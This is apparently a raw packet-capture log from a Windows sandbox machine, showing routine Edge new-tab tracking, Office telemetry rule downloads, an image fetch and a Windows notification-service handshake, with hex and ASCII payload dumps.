2024-11-23 06:09:49 UTC	925	OUT	GET /b?rn=1732342188669&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=076D87ACE96D60880BB292ECE84461D8&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1 Host: sb.scorecardresearch.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-23 06:09:49 UTC	955	IN	HTTP/1.1 302 Found Content-Length: 0 Connection: close Date: Sat, 23 Nov 2024 06:09:49 GMT Location: /b2?rn=1732342188669&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=076D87ACE96D60880BB292ECE84461D8&cs_fpit=o&cs_fpdm=null&cs_fpdt=null set-cookie: UID=1553f9fbcf8eec5bf09da821732342189; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000 set-cookie: XID=1553f9fbcf8eec5bf09da821732342189; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000 Accept-CH: UA, Platform, Arch, Model, Mobile X-Cache: Miss from cloudfront Via: 1.1 fa2ecff4e65c01748abe1c8c2a9dfb72.cloudfront.net (CloudFront) X-Amz-Cf-Pop: JFK52-P3 X-Amz-Cf-Id: w2De0bGdZwYzO3ci65cPmrSiLjcJqsyAVJ_pL7W9nNgTaZOvoO_K1w==

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.6	49908	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:49 UTC	192	OUT	GET /rules/rule120665v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:50 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:50 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D30478D" x-ms-request-id: 0ecd932e-001e-0066-5d4b-3c561e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060950Z-15b8b599d88g5tp8hC1TEByx6w00000002e000000000e8nf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:50 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.6	49909	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:49 UTC	192	OUT	GET /rules/rule120666v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:50 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:50 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3F48DAE" x-ms-request-id: c9d02f83-e01e-0033-4d75-3b4695000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060950Z-174c587ffdfb5q56hC1TEB04kg00000002c000000000hh9p x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:50 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.6	49911	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:49 UTC	192	OUT	GET /rules/rule120668v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:50 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:50 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3CAEBB8" x-ms-request-id: edaf41ae-201e-0051-5e49-3c7340000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060950Z-174c587ffdfgcs66hC1TEB69cs00000002d0000000008mfc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:50 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.6	49910	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:50 UTC	192	OUT	GET /rules/rule120667v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:50 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:50 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BB9B6040B" x-ms-request-id: 8d96ff29-301e-0020-36b1-3b6299000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060950Z-15b8b599d882zv28hC1TEBdchn00000002fg000000005640 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:50 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.6	49882	104.117.182.56	443	7312	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:50 UTC	634	OUT	GET /tenant/amp/entityid/BB1msySq.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-23 06:09:50 UTC	519	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Last-Modified: Wed, 20 Nov 2024 12:30:23 GMT X-Datacenter: eastus X-ActivityId: d4195c89-895d-4a47-a7b7-eecd2ccf32d3 Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Type: image/jpeg Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1msySq X-Source-Length: 55350 Content-Length: 55350 Cache-Control: public, max-age=195687 Expires: Mon, 25 Nov 2024 12:31:17 GMT Date: Sat, 23 Nov 2024 06:09:50 GMT Connection: close
2024-11-23 06:09:50 UTC	15865	IN	Data Raw: ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 Data Ascii: XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmdd
2024-11-23 06:09:50 UTC	16384	IN	Data Raw: 29 cf a9 d5 a6 52 e3 92 27 69 45 6b 44 c0 c9 26 f3 b6 05 4b 27 d7 97 01 95 65 c8 8d 12 15 a9 e8 1b 2f 7e 04 c9 27 c5 fc 85 b2 01 ab 70 82 ce 8c b2 91 1d be 60 e7 de 46 06 d7 64 ba 02 b5 b9 fe 85 69 f5 8f dc ca db 6c 00 9f 51 74 f3 e2 0a d7 9f 0f dc 4b 47 05 e6 c9 56 a7 a2 e4 51 1d 57 a9 5b 9e 07 3b 4e 50 a0 91 20 1d 55 f7 4b 2c 2c ff 00 72 74 8f ec 72 eb 83 10 09 cb 71 9c 0c ab 29 c0 e9 37 99 70 f7 c4 61 22 3a 36 25 94 1c be ee 4b 97 11 5a 85 9e 3e 20 0d 44 a6 31 7c f0 f2 0c d2 52 b0 12 93 f8 b2 fc c6 73 3f 75 58 81 56 de 59 b2 29 8f ec 3d db 55 78 00 4f 9b 18 3b 85 c3 f7 67 48 36 f5 39 2b ca 3f 21 01 17 dd 87 e4 87 c1 46 22 2b 26 a3 12 e7 fa f4 10 57 29 42 59 8b 10 1a ab 9e 6f de 00 db 37 fd c2 02 27 19 71 27 dd 6c fe 03 55 71 59 22 b5 cf 2e 88 ad a5 25 Data Ascii: )R'iEkD&K'e/~'p`FdilQtKGVQW[;NP UK,,rtrq)7pa":6%KZ> D1\|Rs?uXVY)=UxO;gH69+?!F"+&W)BYo7'q'lUqY".%
2024-11-23 06:09:50 UTC	2741	IN	Data Raw: a9 4c fc 4e af 34 20 2c ae 29 7c c8 ac bc 3c 81 5f 20 6a 5e 01 a0 3d b3 07 9a e2 8e 73 c4 ba 5f 97 20 0e c9 85 b7 dd 58 4a 23 39 06 b4 ce 6d 9a 16 9e 0d 80 63 91 aa f4 b0 b6 db d4 e6 99 fb f3 22 4b 8e 7c 83 61 a5 59 bc e5 a7 e1 88 4a 5b 35 e9 8c 03 a6 5c 3c 13 fd 8e d6 a7 35 10 2d 98 8e 1c bf 2c a4 c9 69 4f 1f 98 47 7c f8 78 03 97 ef 8a 1c 0a ac d2 8f 46 19 d9 ad 30 de 1c 79 81 99 e4 e4 e9 f1 9f 7e 63 21 14 e1 e8 36 09 48 b5 90 b8 a8 e4 30 59 70 45 6f 7f ec 2b 71 8c 7e e7 28 7f 84 5b 23 7d 48 e1 91 32 b0 b1 33 8f a7 c5 8c ab 5f c8 a0 e9 d2 f0 19 3c f8 af 01 72 7d 4b 58 c3 1f 31 1b 46 99 f0 f8 73 f0 02 fe c7 0f 38 7c 30 67 26 9b 1a 6b 6f b5 a8 63 0a b9 7f 63 4e e2 d2 b6 f7 15 93 95 d2 21 d7 83 e7 10 e4 c5 5c f2 e9 e4 6b a5 1e e2 d0 b3 78 c6 1e 82 27 a5 b5 Data Ascii: LN4 ,)\|<_ j^=s_ XJ#9mc"K\|aYJ[5\<5-,iOG\|xF0y~c!6H0YpEo+q~([#}H23_<r}KX1Fs8\|0g&koccN!\kx'
2024-11-23 06:09:50 UTC	16384	IN	Data Raw: 8d 28 fc ec 2a a6 cc bf b6 93 e3 6f dd 8f 99 71 d3 cf 76 95 1c 5e 5e 48 14 47 54 7b 1f 4a 8d ce 9d b8 e9 1f bc c8 8f 65 59 e1 4f 24 ff 00 de 1c cc b8 bc a9 09 f6 c6 4b 33 d1 af 6d 4f e9 4f cd c2 f2 fd 45 7d a4 39 71 1d 12 8f 9c b1 f3 c4 71 af 39 2c f1 48 26 6b 3c 83 de bb 1b 6e 1b b6 5c 27 ff 00 88 5d 1b 58 c4 cf fa df e5 98 f9 41 c6 b2 d6 aa cd b7 c5 4a 82 d2 d6 a5 93 4f 34 6d 54 51 0b 6d f2 c5 fb f8 0d 96 8d 2f 67 8c e5 a9 3e 93 98 b9 c3 e2 da d6 df 77 b7 f7 e9 fa bf cb 6a bf b9 f2 b2 c1 ae 78 a3 c7 b5 6d b6 dd 6c a1 ae a6 fd ad c7 b6 fe dd b4 a3 0f ba d3 f3 43 ef ee 7d 78 d5 b5 59 ea 9d a4 53 3d 1f 17 99 f7 70 e9 e2 74 da a9 38 7e 61 9d 78 24 ea fa ab 39 fc a0 13 ad d3 c6 d6 5c 56 3f 12 b9 c4 f1 4d 55 78 e4 c5 fb 78 38 26 89 e3 1d 24 ef a7 6e ab c9 fe Data Ascii: (*oqv^^HGT{JeYO$K3mOOE}9qq9,H&k<n\']XAJO4mTQm/g>wjxmlC}xYS=pt8~ax$9\V?MUxx8&$n
2024-11-23 06:09:50 UTC	3976	IN	Data Raw: a3 33 40 9c 9b 32 02 d2 34 95 16 32 cb 3b 5b 0f 08 47 53 59 63 2b 2b ce ef 97 d4 d8 72 7c 53 71 91 fa 05 f6 f5 d5 d7 a9 f1 1d ce cd b6 37 2d 5b 28 e8 6f 86 9c 7d db dc ac 62 61 90 e0 de 65 b9 42 79 3c 86 56 23 c8 e5 00 0d 21 13 12 3a 1d 2c 40 d2 47 98 b2 41 13 9a 10 6c 06 fb 58 cc 26 b2 07 81 a6 04 d2 01 98 64 d0 56 b9 02 68 03 88 72 63 35 20 48 47 81 d8 62 74 81 24 8c 24 1c 00 d0 42 8a d8 03 d4 60 69 8d 32 00 cd 09 1c c9 9a 19 66 00 ad 10 77 e0 48 60 15 0d 10 21 64 01 a6 3c 09 62 64 76 68 40 a5 9e 64 92 b4 30 e1 46 48 8d 00 6d 3a 48 46 ca 08 d9 d9 8a 50 06 92 8a 87 80 0e 38 e3 80 29 44 2a 60 0c 74 b1 06 00 a4 38 a0 16 0e 28 d0 00 a2 0c 0d 88 38 a7 66 51 85 29 0a 90 19 e3 29 26 41 67 4a 04 23 2b 2a 20 e8 03 8e 1a 05 10 51 92 15 20 e9 40 8e 42 aa b2 68 0a Data Ascii: 3@242;[GSYc++r\|Sq7-[(o}baeBy<V#!:,@GAlX&dVhrc5 HGbt$$B`i2fwH`!d<bdvh@d0FHm:HFP8)D`t8(8fQ))&AgJ#+ Q @Bh

Session ID	Source IP	Source Port	Destination IP	Destination Port
126	192.168.2.6	49913	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:50 UTC	192	OUT	GET /rules/rule120669v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:51 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:50 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB5284CCE" x-ms-request-id: 9cc78053-901e-008f-7b8c-3a67a6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060950Z-174c587ffdf4zw2thC1TEBu34000000002h000000000k7uc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:51 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.6	49912	20.198.118.190	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:50 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4b 77 6b 47 4d 2b 32 33 51 30 65 30 32 70 58 63 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 61 38 64 37 35 39 63 31 62 39 37 32 66 32 37 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: KwkGM+23Q0e02pXc.1Context: 2a8d759c1b972f27
2024-11-23 06:09:50 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-11-23 06:09:50 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 4b 77 6b 47 4d 2b 32 33 51 30 65 30 32 70 58 63 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 61 38 64 37 35 39 63 31 62 39 37 32 66 32 37 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 36 6d 33 39 2f 70 35 62 71 4b 33 4e 2b 6b 31 2f 6d 71 42 62 4a 55 63 34 6f 4d 32 4f 38 72 56 46 47 67 45 31 57 59 51 58 7a 4d 45 54 45 53 4c 64 78 61 30 61 4c 51 6d 79 35 5a 69 39 4e 52 39 35 34 2b 5a 2b 58 6f 72 68 48 59 36 74 36 33 73 53 2f 72 67 50 68 58 36 6f 4a 79 2f 61 71 61 6d 50 43 5a 31 54 74 62 61 65 4f 5a 46 69 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: KwkGM+23Q0e02pXc.2Context: 2a8d759c1b972f27<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAR6m39/p5bqK3N+k1/mqBbJUc4oM2O8rVFGgE1WYQXzMETESLdxa0aLQmy5Zi9NR954+Z+XorhHY6t63sS/rgPhX6oJy/aqamPCZ1TtbaeOZFi
2024-11-23 06:09:50 UTC	74	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 4b 77 6b 47 4d 2b 32 33 51 30 65 30 32 70 58 63 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 61 38 64 37 35 39 63 31 62 39 37 32 66 32 37 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 56MS-CV: KwkGM+23Q0e02pXc.3Context: 2a8d759c1b972f27
2024-11-23 06:09:51 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-11-23 06:09:51 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 35 4d 59 6b 30 4c 33 59 43 6b 4b 43 47 66 44 7a 4b 67 56 31 5a 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: 5MYk0L3YCkKCGfDzKgV1Zw.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.6	49917	104.117.182.56	443	7312	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
